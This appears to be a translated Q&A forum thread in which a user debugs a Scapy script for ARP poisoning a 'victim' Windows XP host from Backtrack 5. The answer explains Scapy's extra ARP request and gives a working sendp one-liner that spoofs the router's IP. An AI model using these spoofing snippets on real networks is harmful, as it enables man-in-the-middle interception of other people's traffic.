Отравление Scapy arp у меня не работает

Я атакую ​​машину Windows XP с помощью Backtrack 5, используя scapy.

Вот мой код:

#! /usr/bin/env python

from scapy.all import *

arp_p = ARP(op = 1, psrc = "192.168.0.1", pdst = "192.168.0.106", hwsrc = "00:0c:29:f0:2d:19", hwdst = "ff:ff:ff:ff:ff:ff)
send(arp_p)

Приведенный выше код по какой-то причине фактически отправляет два пакета. Однажды мой Mac с возвратом спрашивает:

у кого 192.168.0.106 (IP жертвы)? Сообщите 192.168.0.108 (IP-адрес Backtrack - НЕ ДОЛЖНО БЫТЬ!).

Затем он получает от жертвы ответ «готово».

И во второй раз Mac моего backtrack спрашивает:

у кого 192.168.0.106 (IP жертвы)? Сообщите 192.168.0.1 (IP-адрес маршрутизатора).

Затем он снова получает от жертвы ответ «готово».

Затем в таблице ARP жертвы должны быть строки с одним и тем же Mac, но с разными IP-адресами, один из которых является реальным IP-адресом Backtrack, а второй - IP-адресом маршрутизатора.

Почему это происходит?


python scapy
person user3016694    schedule 05.12.2013    source источник

Ответы (1)


arrow_upward
1
arrow_downward

Первый ARP пакет, который вы видите, исходит от Scapy, потому что он хочет заполнить Ether фрейм MAC-адресом жертвы перед send()-отправкой вашего ARP пакета.

Если вы не хотите, чтобы это произошло, попробуйте (sendp отправляет на уровне 2):

>>> sendp(Ether(dst=ETHER_BROADCAST)/ARP(psrc = "192.168.0.1", pdst = "192.168.0.106"))

Вы можете заменить ETHER_BROADCAST MAC-адресом вашей жертвы, это будет менее шумно.

person Pierre    schedule 25.01.2014